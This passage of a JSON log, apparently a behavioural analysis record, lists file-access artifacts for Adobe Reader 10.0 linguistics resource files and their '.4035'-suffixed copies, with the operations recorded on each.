"C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd43.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd43.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\swd58.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\swd58.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur111.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur111.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur32.clx", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur32.clx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa.fca", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa.fca", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.hsp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.hsp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa03.ths", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa03.ths", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\usa37.hyp", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\usa37.hyp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_AE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ae.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_BH.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_bh.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_DZ.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_dz.txt", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt", "operations": [ "access", "read", "write" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt.4035", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt", "hashes": [], 